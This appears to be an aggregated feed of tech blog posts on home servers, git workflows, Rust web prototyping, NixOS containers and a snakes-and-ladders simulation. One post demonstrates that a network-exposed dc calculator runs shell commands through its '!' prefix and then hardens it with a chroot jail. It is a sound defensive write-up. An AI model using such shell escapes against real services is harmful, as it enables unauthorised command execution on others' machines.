The machine these are in is a fileserver at my home. The four 320GB HDDs are what the operating system is installed on, whereas the hodge podge assortment of differently-sized HDDs and SSDs are the main storage for files.

That is not the most performant way to do things, but it’s only at home and doesn’t need best performance. It mostly just uses up discarded storage from other machines as they get replaced.

sdd has seen every release of Debian since 4.0 (etch) and several iterations of hardware, but this can’t go on much longer. The machine that the four 320GB HDDs are in now is very underpowered but any replacement I can think of won’t be needing four 3.5″ SATA devices inside it. More like 2x 2.5″ NVMe or M.2.

Then again, I’ve been saying that it must be replaced for about 5 years now, so who knows how long it will take me. sdd will definitely reach 120,000 hours barring hardware failure in the next month.

blkleaderboard.sh is on GitHub, by the way.

Alun JonesI wrote a static site generator

Back in 2019, when Google+ was shut down, I decided to start writing this blog. It seemed better to take my ramblings under my own control, rather than posting content - about 716 words

Alun JonesSolar panels

After an 8 month wait, we finally had solar panels installed at the start of July. We originally ordered, from e-on, last November, and were told that there was a - about 542 words

Alun JonesVirtual WiFi

At work I've been developing a system which runs on an embedded Linux machine and provides a service via a "captive" WiFi access point. Much of my dev work on - about 243 words

BitFolk Issue TrackerMisc infrastructure - Feature #212: Publish a DKIM record for bitfolk.com and sign emails with it

Aggregate reports show that the Icinga host is sending mail as without DKIM signature, though SPF is already covered.
DKIM signatures added for this now.

BitFolk Issue TrackerMisc infrastructure - Feature #212: Publish a DKIM record for bitfolk.com and sign emails with it

Amusingly this redmine VM sends email as so that will need to be fixed. See issue #213

BitFolk Issue TrackerMisc infrastructure - Feature #213 (New): Make redmine host send email through main mail relay

This VM (redmine) sends email as which will need to be DKIM-signed. Probably the easiest way to do this is have it route such mails through the main outbound mail relay instead of trying to deliver them directly.

Alex HudsonJobs in the AI Future

Everyone is talking about what AI can do right now, and the impact that it is likely to have on us. This weekends’s Semafor Flagship (which is an excellent newsletter; I recommend subscribing!) asks a great question: “What do we teach the AI generation?”. As someone who grew up with computers, knowing he wanted to write software, and knowing that tech was a growth area, I never had to grapple with this type of worry personally. But I do have kids now. And I do worry. I’m genuinely unsure what I would recommend a teenager to do today, right now. But here’s my current thinking.

Alun JonesMy new sensor network

If you've been following (and why should you?) you'll know I've spent years mucking around with cheap 433MHz radios to build a sensor network. When I started out with this, - about 571 words

Paul RudkinYour new post

Your new post

This is a new blog post. You can author it in Markdown, which is awesome.

David LeadbeaterNAT-Again: IRC NAT helper flaws

A Linux kernel bug allows unencrypted NAT'd IRC sessions to be abused to access resources behind NAT, or drop connections. Switch to TLS right now. Or read on.

David Leadbeaterip.wtf and showing you your actual HTTP request

Using haproxy in strange ways

Paul RaynerPutting dc in (chroot) jail

A little over 4 years ago, I set up a VM and configured it to offer dc over a network connection using xinetd. I set it up at http://dc.pr0.uk and made it available via a socket connection on port 1312.

Yesterday morning I woke to read a nice email from Sylvan Butler pointing out that users could run shell commands from dc…

I had set up the dc command to run as a user “dc”, but still, if someone could run a shell command they could, for example, put a key in the dc user’s .ssh config, run sendmail (if it was set up), try for privelidge escalations to get root etc.

I’m not sure what the 2017 version of me was thinking (or wasn’t), but the 2022 version of me is not happy to leave it like this. So here’s how I put dc in jail.

Firstly, how do you run shell commands from dc? It’s very easy. Just prefix with a bang:

$ dc
!echo "I was here" > /tmp/foo
!cat /tmp/foo
I was here

So, really easy. Even if it was hard, it would still be bad.

This needed to be fixed. Firstly I thought about what else was on the VM - nothing that matters. This is a good thing because the helpful Sylvan might not have been the first person to spot the issue (although network dc is pretty niche). I still don’t want this vulnerability though as someone else getting access to this box could still use it to send spam, host malware or anything else they wanted to do to a cheap tiny vm.

I looked at restricting the dc user further (it had no login shell, and no home directory already), but it felt like I would always be missing something, so I turned to chroot jails.

A chroot jail lets you run a command, specifying a directory which is used as / for that command. The command (In theory) can’t escape that directory, so can’t see or touch anything outside it. Chroot is a kernel feature, and forms a basic security feature of linux, so should be good enough to protect network dc if set up correctly, even if it’s not perfect.

Firstly, let’s set up the directory for the jail. We need the programs to run inside the jail, and their dependent libraries. The script to run a networked dc instance looks like this:

#!/bin/bash
dc --version
sed -u -e 's/\r/\n/g' | dc

Firstly, I’ve used bash here, but this script is trivial, so it can use sh instead. We also need to keep the sed (I’m sure there are plenty of ways to do the replace not using sed, but it’s working fine as it is). For each of the 3 programs we need to run the script, I ran ldd to get their dependencies:

$ ldd /usr/bin/dc
	linux-vdso.so.1 =>  (0x00007fffc85d1000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fc816f8d000)
	/lib64/ld-linux-x86-64.so.2 (0x0000555cd93c8000)
$ ldd /bin/sh
	linux-vdso.so.1 =>  (0x00007ffdd80e0000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fa3c4855000)
	/lib64/ld-linux-x86-64.so.2 (0x0000556443a1e000)
$ ldd /bin/sed
	linux-vdso.so.1 =>  (0x00007ffd7d38e000)
	libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007faf5337f000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007faf52fb8000)
	libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007faf52d45000)
	libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007faf52b41000)
	/lib64/ld-linux-x86-64.so.2 (0x0000562e5eabc000)
	libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007faf52923000)
$

So we copy those files to the exact directory structure inside the jail directory. Afterwards it looks like this:

$ ls -alR
.:
total 292
drwxr-xr-x 4 root root   4096 Feb  5 10:13 .
drwxr-xr-x 4 root root   4096 Feb  5 09:42 ..
-rwxr-xr-x 1 root root  47200 Feb  5 09:50 dc
-rwxr-xr-x 1 root root     72 Feb  5 10:13 dctelnet
drwxr-xr-x 3 root root   4096 Feb  5 09:49 lib
drwxr-xr-x 2 root root   4096 Feb  5 09:50 lib64
-rwxr-xr-x 1 root root  72504 Feb  5 09:58 sed
-rwxr-xr-x 1 root root 154072 Feb  5 10:06 sh

./lib:
total 12
drwxr-xr-x 3 root root 4096 Feb  5 09:49 .
drwxr-xr-x 4 root root 4096 Feb  5 10:13 ..
drwxr-xr-x 2 root root 4096 Feb  5 10:01 x86_64-linux-gnu

./lib/x86_64-linux-gnu:
total 2584
drwxr-xr-x 2 root root    4096 Feb  5 10:01 .
drwxr-xr-x 3 root root    4096 Feb  5 09:49 ..
-rwxr-xr-x 1 root root 1856752 Feb  5 09:49 libc.so.6
-rw-r--r-- 1 root root   14608 Feb  5 10:00 libdl.so.2
-rw-r--r-- 1 root root  468920 Feb  5 10:00 libpcre.so.3
-rwxr-xr-x 1 root root  142400 Feb  5 10:01 libpthread.so.0
-rw-r--r-- 1 root root  146672 Feb  5 09:59 libselinux.so.1

./lib64:
total 168
drwxr-xr-x 2 root root   4096 Feb  5 09:50 .
drwxr-xr-x 4 root root   4096 Feb  5 10:13 ..
-rwxr-xr-x 1 root root 162608 Feb  5 10:01 ld-linux-x86-64.so.2
$

and here is the modified dctelnet command:

#!/sh
#dc | dos2unix 2>&1
./dc --version
./sed -u -e 's/\r/\n/g' | ./dc

I’ve switched to using sh instead of bash, and all of the commands are now relative paths, as they are just in the root directory.

First attempt

Now I have a directory that I can use for a chrooted dc network dc. I need to set up the xinetdconfig to use chroot and the jail I have set up:

service dc
{
	disable		= no
	type		= UNLISTED
	id		= dc-stream
	socket_type	= stream
	protocol	= tcp
	server		= /usr/sbin/chroot
	server_args	= /home/dc/ ./dctelnet
	user		= root
	wait		= no
	port		= 1312
	rlimit_cpu	= 60
	env		= HOME=/ PATH=/
}

I needed to set the HOME and PATH environment variables otherwise (not sure whether it was sh,sed or dc causing it) I got a segfault, and to run chroot, you need to be root, so I could no longer run the service as the user dc. This shouldn’t be a problem because the resulting process is constrained.

A bit more security

Chroot jails have a reputation for being easy to get wrong, and they are not something I have done a lot of work with, so I want to take a bit of time to think about whether I’ve left any glaring holes, and also try to improve on the simple option above a bit if I can.

Firstly, can dc still execute commands with the ! operation?

 ~> nc -v dc.pr0.uk 1312
Connection to dc.pr0.uk 1312 port [tcp/*] succeeded!
dc (GNU bc 1.06.95) 1.3.95

Copyright 1994, 1997, 1998, 2000, 2001, 2004, 2005, 2006 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE,
to the extent permitted by law.
!ls
^C⏎

Nope. Ok, that’s good. The chroot jail has sh though, and has it in the PATH, so can it still get a shell and call dc, sh and sed?

 ~> nc -v dc.pr0.uk 1312
Connection to dc.pr0.uk 1312 port [tcp/*] succeeded!
dc (GNU bc 1.06.95) 1.3.95

Copyright 1994, 1997, 1998, 2000, 2001, 2004, 2005, 2006 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE,
to the extent permitted by law.
!pwd
^C⏎

pwd is a builtin, so it looks like the answer is no, but why? Running strings on my version of dc, there is no mention of sh or exec, but there is a mention of system. From the man page of system:

The system() library function uses fork(2) to create a child process that executes the shell  command  specified in command using execl(3) as follows:

           execl("/bin/sh", "sh", "-c", command, (char *) 0);

So dc calls system() when you use !, which makes sense. system() calls /bin/sh, which does not exist in the jail, breaking the ! call.

For a system that I don’t care about, that is of little value to anyone else, that sees very little traffic, that’s probably good enough, but I want to make it a bit better - if there was a problem with the dc program, or you could get it to pass something to sed, and trigger an issue with that, you could mess with the jail file system, overwrite the dc application, and likely break out of jail as the whole thing is running as root.

So I want to do two things. Firstly, I don’t want dc running as root in the jail. Secondly, I want to throw away the environment after each use, so if you figure out how to mess with it you don’t affect anyone else’s fun.

Here’s a bash script which I think does both of these things:

#!/bin/bash
set -e
DCDIR="$(mktemp -d /tmp/dc_XXXX)"
trap '/bin/rm -rf -- "$DCDIR"' EXIT
cp -R /home/dc/ $DCDIR/
cd $DCDIR/dc
PATH=/
HOME=/
export PATH
export HOME
/usr/sbin/chroot --userspec=1001:1001 . ./dctelnet
  • Line 2 - set -e causes the script to exit on the first error
  • Lines 3 & 4 - make a temporary directory to run in, then set a trap to clean it up when the script exits.
  • I then copy the required files for the jail to the new temp directory, set $HOME and SPATH and run the jail as an unprivileged user (uid 1001).

Now to make some changes to the xinetd file:

service dc
{
        disable         = no
        type            = UNLISTED
        id              = dc-stream
        socket_type     = stream
        protocol        = tcp
        server          = /usr/local/bin/dcinjail
        user            = root
        wait            = no
        port            = 1312
        rlimit_cpu      = 60
        log_type        = FILE /var/log/dctelnet.log
        log_on_success  = HOST PID DURATION
        log_on_failure  = HOST
}

The new version just runs the script from above. It still needs to run as root to be able to chroot.

I’ve also added some logging as this has piqued my interest and I want to see how many people (other than me) ever connect, and for how long.

As always, I’m interested in feedback or questions. I’m no expert in this setup so may not be able to answer questions, but if you see something that looks wrong (or that you know is wrong), please let me know. I’m also interested to hear other ways of process isolation - I know I could have used containers, and think I could have used systemd or SELinux features (or both) to further lock down the dc user and achive a similar result.

Thanks for reading.

Christopher RobertsFixing SVG Files in DokuWiki

Featured Image

Having upgraded a DokuWiki server from 16.04 to 18.04, I found that SVG images were no longer displaying in the browser. As I was unable to find any applicable answers on-line, I thought I should break my radio silence by detailing my solution.

Inspecting the file using browser tools, Network and refreshing the page showed that the file was being downloaded as octet-stream. Sure enough using curl showed the same.

curl -Ik https://example.com/file.svg

All the advice on-line is to ensure that /etc/nginx/mime-types includes the line:

image/svg+xml   svg svgz;

But that was already in place.

I decided to try uploading the SVG file again, in case the Inkscape format was causing breakage. Yes, a long-shot indeed.

The upload was rejected by DokuWiki, as SVG was not in the list of allowed file extensions; so I added the following line to /var/www/dokuwiki/conf/mime.local.conf:

svg   image/svg_xml

Whereon the images started working again. Presumably Dokuwiki was seeing the mime-type as image/svg instead of image/svg+xml and this mismatch was preventing nginx serving up the correct content-type.

Hopefully this will help others, do let me know if it has helped you.

Paul RaynerSnakes and Ladders, Estimation and Stats (or 'Sometimes It Takes Ages')

Snakes And Ladders

Simple kids game, roll a dice and move along a board. Up ladders, down snakes. Not much to it?

We’ve been playing snakes and ladders a bit (lot) as a family because my 5 year old loves it. Our board looks like this:

Some games on this board take a really long time. My son likes to play games till the end, so until all players have finished. It’s apparently really funny when everyone else has finished and I keep finding the snakes over and over. Sometimes one player finishes really quickly - they hit some good ladders, few or no snakes and they are done in no time.

This got me thinking. What’s the distribution of game lengths for snakes and ladders? How long should we expect a game to take? How long before we typically have a winner?

Fortunately for me, snakes and ladders is a very simple game to model with a bit of python code.

Firstly, here are the rules we play:

1) Each player rolls a normal 6 sided dice and moves their token that number of squares forward. 2) If a player lands on the head of a snake, they go down the snake 3) If a player lands on the bottom of a ladder, they go up to the top of the ladder. 4) If a player rolls a 6, they get another roll 5) On this board, some ladders and snakes interconnect - the bottom of a snake is the head of another, or the top of a ladder is also the head of a snake. When this happens, you do all of the actions in turn, so down both snakes or up the ladder, down the snake. 6) You don’t need an exact roll to finish, once you get 100 or more, you are done.

To model the board in python, all we really need are the coordinates of the snakes and the ladders - their starting and ending squares.

def get_snakes_and_ladders():

   snakes = [
        (96,27),
        (88,66),
        (89,46),
        (79,44),
        (76,19),
        (74,52),
        (57,3),
        (60,39),
        (52,17),
        (50,7),
        (32,15),
        (30,9)
    ]
    ladders = [
        (6,28),
        (10,12),
        (18,37),
        (40,42),
        (49,67),
        (55,92),
        (63,76),
        (61,81),
        (86,94)
    ]
    return snakes + ladders

Since snakes and ladders are both mappings from one point to another, we can combine them in one array as above.

The game is moddeled with a few lines of python:

class Game:

    def __init__(self) -> None:
        self.token = 1
        snakes_and_ladders_list = get_snakes_and_ladders()
        self.sl = {}
        for entry in snakes_and_ladders_list:
            self.sl[entry[0]] = entry[1]

    def move(self, howmany):
        self.token += howmany
        while (self.token in self.sl):
            self.token = self.sl[self.token]
        return self.token

    def turn(self):
        num = self.roll()
        self.move(num)
        if num == 6:
            self.turn()
        if self.token>=100:
            return True
        return False

    def roll(self):
        return randint(1,6)

A turn consists of all the actions taken by a player before the next player gets their turn. This can consist of multiple moves if the player rolles one or more sixes, as rolling a six gives you another move.

With this, we can run some games and plot them. Here’s what a sample looks like.

The Y axis is the position on the board, and the X axis is the number of turns. This small graphical representation of the game shows how variable it can be. The red player finishes in under 20 moves, whereas the orange player takes over 80.

To see how variable it is, we can run the simulation a large number of times and look at the results. Running for 10,000 games we get the following:

function result
min 5
max 918
mean 90.32
median 65

So the fastest finish in 10,000 games was just 5 turns, and the slowest was an awful (if you were rolling the dice) 918 turns.

Here are some histograms for the distribution of game lengths, the distribution of number of turns for a player to win in a 3 person game, and the number of turns for all players to finish in a 3 person game.

The python code for this post is at snakes.py

Alex HudsonIntroduction to the Metaverse

You’ve likely heard the term “metaverse” many times over the past few years, and outside the realm of science fiction novels, it has tended to refer to some kind of computer-generated world. There’s often little distinction between a “metaverse” and a relatively interactive virtual reality world.

There are a huge number of people who think this simply a marketing term, and Facebook’s recent rebranding of its holding company to “Meta” has only reinforced this view. However, I think this view is wrong, and I hope to explain why.

Alex HudsonIt's tough being an Azure fan

Azure has never been the #1 cloud provider - that spot continues to belong to AWS, which is the category leader. However, in most people’s minds, it has been a pretty reasonable #2, and while not necessarily vastly differentiated from AWS there are enough things to write home about.

However, even as a user and somewhat of a fan of the Azure technology, it is proving increasing difficult to recommend.

Josh HollandMore on git scratch branches: using stgit

More on git scratch branches: using stgit

I wrote a short post last year about a useful workflow for preserving temporary changes in git by using a scratch branch. Since then, I’ve come across stgit, which can be used in much the same way, but with a few little bells and whistles on top.

Let’s run through a quick example to show how it works. Let’s say I want to play around with the cool new programming language Zig and I want to build the compiler myself. The first step is to grab a source code checkout:

$ git clone https://github.com/ziglang/zig
        Cloning into 'zig'...
        remote: Enumerating objects: 123298, done.
        remote: Counting objects: 100% (938/938), done.
        remote: Compressing objects: 100% (445/445), done.
        remote: Total 123298 (delta 594), reused 768 (delta 492), pack-reused 122360
        Receiving objects: 100% (123298/123298), 111.79 MiB | 6.10 MiB/s, done.
        Resolving deltas: 100% (91169/91169), done.
        $ cd zig
        

Now, according to the instructions we’ll need to have CMake, GCC or clang and the LLVM development libraries to build the Zig compiler. On NixOS it’s usual to avoid installing things like this system-wide but instead use a file called shell.nix to specify your project-specific dependencies. So here’s the one ready for Zig (don’t worry if you don’t understand the Nix code, it’s the stgit workflow I really want to show off):

$ cat > shell.nix << EOF
        { pkgs ? import <nixpkgs> {} }:
        pkgs.mkShell {
          buildInputs = [ pkgs.cmake ] ++ (with pkgs.llvmPackages_12; [ clang-unwrapped llvm lld ]);
        }
        EOF
        $ nix-shell
        

Now we’re in a shell with all the build dependencies, and we can go ahead with the mkdir build && cd build && cmake .. && make install steps from the Zig build instructions1.

But now what do we do with that shell.nix file?

$ git status
        On branch master
        Your branch is up to date with 'origin/master'.
        
        Untracked files:
          (use "git add <file>..." to include in what will be committed)
                shell.nix
        
        nothing added to commit but untracked files present (use "git add" to track)
        

We don’t really want to add it to the permanent git history, since it’s just a temporary file that is only useful to us. But the other options of just leaving it there untracked or adding it to .git/info/exclude are unsatisfactory as well: before I started using scratch branches and stgit, I often accidentally deleted my shell.nix files which were sometimes quite annoying to have to recreate when I needed to pin specific dependency versions and so on.

But now we can use stgit to take care of it!

$ stg init # stgit needs to store some metadata about the branch
        $ stg new -m 'add nix config'
        Now at patch "add-nix-config"
        $ stg add shell.nix
        $ stg refresh
        Now at patch "add-nix-config"
        

This little dance creates a new commit adding our shell.nix managed by stgit. You can stg pop it to unapply, stg push2 to reapply, and stg pull to do a git pull and reapply the patch back on top. The main stgit documentation is helpful to explain all the possible operations.

This solves all our problems! We have basically recreated the scratch branch from before, but now we have pre-made tools to apply, un-apply and generally play around with it. The only problem is that it’s really easy to accidentally push your changes back to the upstream branch.

Let’s have another example. Say I’m sold on the stgit workflow, I have a patch at the bottom of my stack adding some local build tweaks and, on top of that, a patch that I’ve just finished working on that I want to push upstream.

$ cd /some/other/project
        $ stg series # show all my patches
        + add-nix-config
        > fix-that-bug
        

Now I can use stg commit to turn my stgit patch into a real immutable git commit that stgit isn’t going to mess around with any more:

$ stg commit fix-that-bug
        Popped fix-that-bug -- add-nix-config
        Pushing patch "fix-that-bug" ... done
        Committed 1 patch
        Pushing patch "add-nix-config ... done
        Now at patch "add-nix-config"
        

And now what we should do before git pushing is stg pop -a to make sure that we don’t push add-nix-config or any other local stgit patches upstream. Sadly it’s all too easy to forget that, and since stgit updates the current branch to point at the current patch, just doing git push here will include the commit representing the add-nix-config patch.

The way to prevent this is through git’s hook system. Save this as pre-push3 (make sure it’s executable):

#!/bin/bash
        # An example hook script to verify what is about to be pushed.  Called by "git
        # push" after it has checked the remote status, but before anything has been
        # pushed.  If this script exits with a non-zero status nothing will be pushed.
        #
        # This hook is called with the following parameters:
        #
        # $1 -- Name of the remote to which the push is being done
        # $2 -- URL to which the push is being done
        #
        # If pushing without using a named remote those arguments will be equal.
        #
        # Information about the commits which are being pushed is supplied as lines to
        # the standard input in the form:
        #
        #   <local ref> <local sha1> <remote ref> <remote sha1>
        
        remote="$1"
        url="$2"
        
        z40=0000000000000000000000000000000000000000
        
        while read local_ref local_sha remote_ref remote_sha
        do
            if [ "$local_sha" = $z40 ]
            then
                # Handle delete
                :
            else
                # verify we are on a stgit-controlled branch
                git show-ref --verify --quiet "${local_ref}.stgit" || continue
                if [ $(stg series --count --applied) -gt 0 ]
                then
                    echo >&2 "Unapplied stgit patch found, not pushing"
                    exit 1
                fi
            fi
        done
        
        exit 0
        

Now we can’t accidentally4 shoot ourselves in the foot:

$ git push
        Unapplied stgit patch found, not pushing
        error: failed to push some refs to <remote>
        

Happy stacking!


  1. At the time of writing, Zig depends on the newly-released LLVM 12 toolchain, but this hasn’t made it into the nixos-unstable channel yet, so this probably won’t work on your actual NixOS machine.↩︎

  2. an unfortunate naming overlap between pushing onto a stack and pushing a git repo↩︎

  3. A somewhat orthogonal but also useful tip here so that you don’t have to manually add this to every repository is to configure git’s core.hooksDir to something like ~/.githooks and put it there.↩︎

  4. You can always pass --no-verify if you want to bypass the hook.↩︎

Jon FautleyUsing the Grafana Cloud Agent with Amazon Managed Prometheus, across multiple AWS accounts

Observability is all the rage these days, and the process of collecting metrics is getting easier. Now, the big(ger) players are getting in on the action, with Amazon releasing a Managed Prometheus offering and Grafana now providing a simplified “all-in-one” monitoring agent. This is a quick guide to show how you can couple these two together, on individual hosts, and incorporating cross-account access control. The Grafana Cloud Agent Grafana Labs have taken (some of) the best bits of the Prometheus monitoring stack and created a unified deployment that wraps the individual moving parts up into a single binary.

Jon FautleyPosts

Paul RaynerValentines Gift - a Tidy Computer Cupboard

Today, my lovely wife (who is far more practical than me) gave me this as a valentines present (along with a nice new pair of Nano X1 trainers).

This is my nice new home server rack. It’s constructed from the finest pallet wood and repurposed chipboard, and has 8 caster wheels (cheaper than the apple ones) on the bottom.

After three and a half years living in our house, the cupboard under the stairs was a mess of jumbled cables and computer bits. It all worked, but with things balanced on other things, held up by their cables, and three years of dust everywhere it really needed an overhall. We’ve recently had a new fibre connection go in (yay - 1Gbps at home!), so yet another cable, and yet another box to balance on top of other boxes.

This was the sorry mess that I called a home network this morning:

And thanks to my lovely gift, and some time to rewire everything (make new cables), it now looks like this:

and a close up:

In there I have my server, UPS, NAS, phone system, lighting system, FTTC broadband, Fibre broadband, router, main switch, and a cable going out and round the house into my office. Lovely and neat, and because it’s on wheels, I can pull it out to get round the back :-)

I am very happy with my new setup.

Paul RudkinSpring Festival Extra Bandwidth

Due to local restrictions on mass gatherings, this year’s Spring Festival Ceremony of my employer will be held online for all employees (> 2000).

To support the peak in bandwidth demand, some of the mobile phone providers have added additional cells in the grounds of our company. They have been testing for the last few days, so in a few hours we will see how they will perform!!

Paul Rudkin

The roads of China have just got a little more dangerous. My wife has passed her China driving test today!

People of China, save yourself while you can!

Paul Rudkin

Need coffee.

Paul RudkinShanghai reports 6 local COVID-19 cases, first outbreak since November - Global Times

Shanghai found six local confirmed COVID-19 cases in its most populous downtown Huangpu district on Thursday, two months since the last local case was reported in the city, local health authority said on Friday.

Source:Shanghai reports 6 local COVID-19 cases, first outbreak since November - Global Times

Paul RaynerHelper functions for prototyping with Rocket

Over the holidays I have enjoyed playing a little with Rocket. Here are a couple of things I’ve written which might be useful to others when prototyping a new site using rocket.

Firstly, the examples show you how to create an instance of a struct from either a Query or a Form, but when using a template (I am using a rust implementation of Handlebars) it can be useful to just pass all of the fields through as a map. Here are two simple methods (one for Form, another for Query) which populate a HashMap with the incoming data.

struct RequestMap {
    map: HashMap<String,String>
}

impl<'f> FromForm<'f> for RequestMap {
    type Error = ();

    fn from_form(items: &mut FormItems<'f>, _strict: bool) -> Result<RequestMap, ()> {
        let mut map = HashMap::new();

        for item in items {
            let k = item.key.url_decode().map_err(|_| ())?;
            let v = item.value.url_decode().map_err(|_| ())?;
            map.insert(k, v );

        }

        Ok(RequestMap { map})
    }
}

impl FromQuery<'_> for RequestMap {
    type Error = ();

    fn from_query(items: Query) -> Result<RequestMap, ()> {
        let mut map = HashMap::new();
        for item in items {
            let k = item.key.url_decode().map_err(|_| ())?;
            let v = item.value.url_decode().map_err(|_| ())?;
            map.insert(k, v );

        }

        Ok(RequestMap { map})
    }
}

We create a struct RequestMap which contains just a HashMap, then implement the methods FromForm and FromQuery on the map.

Now these maps can be used in routes as follows:

#[get("/example_get/<name>?<params..>")]
fn example_get_route(name: String, params: RequestMap) -> Template {
    Template::render(name, &params.map)
}

#[post("/example_post/<name>", data="<params>")]
fn example_post_route(name: String, params: Form<RequestMap>) -> Template {
    Template::render(name, &params.into_inner().map)
}

In these examples I have also set up a name parameter which maps to the template name, so you can copy and paste templates around and try them out with different parameters easily.

The second Thing I have found useful in prototyping with Rocket is to set up a Handlebars helper to print out information from the provided context. You can put this in to render as a comment in your template so that you can easily see what context is being provided to your template.

Here is the helper definition:

#[derive(Clone,Copy)]
struct DebugInfo;

impl HelperDef for DebugInfo {
    fn call<'reg:'rc,'rc> (&self, h: &Helper, _: &Handlebars, ctxt: &Context, rc: &mut RenderContext, out: &mut dyn Output) -> HelperResult {
        out.write(&format!("Context:{:?}",ctxt.data()))?;
        out.write(&format!("Current Template:{:?}", rc.get_current_template_name()))?;
        out.write(&format!("Root Template:{:?}", rc.get_root_template_name()))?;
        for (key, value) in h.hash() {
            out.write(&format!("HashKey:{:?}, HashValue:{:?}",key, value))?;
        }
        Ok(())
    }
}

and you set it up like this in the Rocket initialisation:

rocket::ignite().mount("/", routes![index,example_get_route,example_post_route])
        .attach(Template::custom(|engines|{
            engines.handlebars.register_helper("debug", Box::new(DebugInfo));
        }))

To use this as a helper, put something like this inside your Handlebars template:

<!--{{debug nameparam=username}}-->

The output should look something like this:

<!--Context:Object({"username": String("aa")})Current Template:Some("testroute")Root Template:Some("testroute")HashKey:"nameparam", HashValue:PathAndJson { relative_path: Some("username"), value: Context(String("paul"), ["username"]) }-->

The above is for a get request where the URL was http:///testroute?username=paul

Thanks for reading. I hope the above proves useful - I am still experimenting with Rocket (also with writing Handlebars helpers and combining all this with htmx ), so there may be simpler or better ways of achieving the above. If you know of one, or if you have any questions, suggestions, or to point out any mistakes, please contact me at the email address below. I’d love to hear from you.

Josh HollandSetting up a dev environment for PostgreSQL with nixos-container

Setting up a dev environment for PostgreSQL with nixos-container

I’ve been using NixOS for about a month now, and one of my favourite aspects is using lorri and direnv to avoid cluttering up my user or system environments with packages I only need for one specific project. However, they don’t work quite as well when you need access to a service like PostgreSQL, since all they can do is install packages to an isolated environment, not run a whole RDBMS in the background.

For that, I have found using nixos-container works very well. It’s documented in the NixOS manual. We’ll be using it in ‘imperative mode’, since editing the system configuration is the exact thing we don’t want to do. You will need sudo/root access to start containers, and I’ll assume you have lorri and direnv set up (e.g. via services.lorri.enable = true in your home-manager config).

We’ll make a directory to work in, and get started in the standard lorri way:

$ mkdir foo && cd foo
        $ lorri init
        Jul 11 21:23:48.117 INFO wrote file, path: ./shell.nix
        Jul 11 21:23:48.117 INFO wrote file, path: ./.envrc
        Jul 11 21:23:48.117 INFO done
        direnv: error /home/josh/c/foo/.envrc is blocked. Run `direnv allow` to approve its content
        $ direnv allow .
        Jul 11 21:24:10.826 INFO lorri has not completed an evaluation for this project yet, expr: /home/josh/c/foo/shell.nix
        direnv: export +IN_NIX_SHELL
        

Now we can edit our shell.nix to install PostgreSQL to access it as a client:

# shell.nix
        { pkgs ? import <nixpkgs> {} }:
        
        pkgs.mkShell {
          buildInputs = [
            pkgs.postgresql
          ];
        }
        

Save that and lorri will start installing it in the background.

Now, we can define our container, by providing its configuration in a file. I have called it container.nix, but I don’t think there’s a standard name for it like there is for shell.nix. Here it is:

# container.nix
        { pkgs, ... }:
        
        {
          system.stateVersion = "20.09";
        
          networking.firewall.allowedTCPPorts = [ 5432 ];
        
          services.postgresql = {
            enable = true;
            enableTCPIP = true;
            extraPlugins = with pkgs.postgresql.pkgs; [ postgis ];
            authentication = "host all all 10.233.0.0/16 trust";
        
            ensureDatabases = [ "foo" ];
            ensureUsers = [{
              name = "foo";
              ensurePermissions."DATABASE foo" = "ALL PRIVILEGES";
            }];
          };
        }
        

It’s important to make sure the firewall opens the port so that we can actually access PostgreSQL, and I’ve also installed the postgis extension for geospatial tools. The authentication line means that any user on any container can authenticate as any user with no checking: fine for development purposes, but obviously be careful not to expose this to the internet! Finally, we set up a user and a database to do our work in.

Now, we can actually create and start the container using the nixos-container tool itself. This is the only step that requires admin rights.

$ sudo nixos-container create foo --config-file container.nix
        $ sudo nixos-container start foo
        

By now, lorri should have finished installing PostgreSQL into your local environment, so once nixos-container has finished running, you should be able to access the new database inside the container:

$ psql -U foo -h $(nixos-container show-ip foo) foo
        psql (11.8)
        Type "help" for help.
        
        foo=> \l
                                          List of databases
           Name    |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges
        -----------+----------+----------+-------------+-------------+-----------------------
         foo       | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =Tc/postgres         +
                   |          |          |             |             | postgres=CTc/postgres+
                   |          |          |             |             | foo=CTc/postgres
         postgres  | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
         template0 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
                   |          |          |             |             | postgres=CTc/postgres
         template1 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
                   |          |          |             |             | postgres=CTc/postgres
        (4 rows)
        

And there we go! We have a container that we can access from the command line, or from an app, and we didn’t need to install PostgreSQL globally. We can even have multiple containers like this for different projects, and they’ll all use the same Nix store for binaries but have completely isolated working environments.

The nixos-container tool itself is a fairly thin wrapper around systemd (the containers themselves work via systemd-nspawn). The containers won’t auto-start, and you have to use systemctl to make that happen:

$ sudo systemctl enable container@foo.service
        

As a final flourish, we can save having to type in the user, host IP and database with very little effort, since we’re already using direnv and most tools can take their PostgreSQL configuration from some standard environment variables. We just have to add them to our .envrc file, and then re-allow it.

$ cat .envrc
        PGHOST=$(nixos-container show-ip foo)
        PGUSER=foo
        PGDATABASE=foo
        export PGHOST PGUSER PGDATABASE
        
        eval "$(lorri direnv)"
        $ direnv allow .
        $ psql
        psql (11.8)
        Type "help" for help.
        
        foo=>
        

Footnotes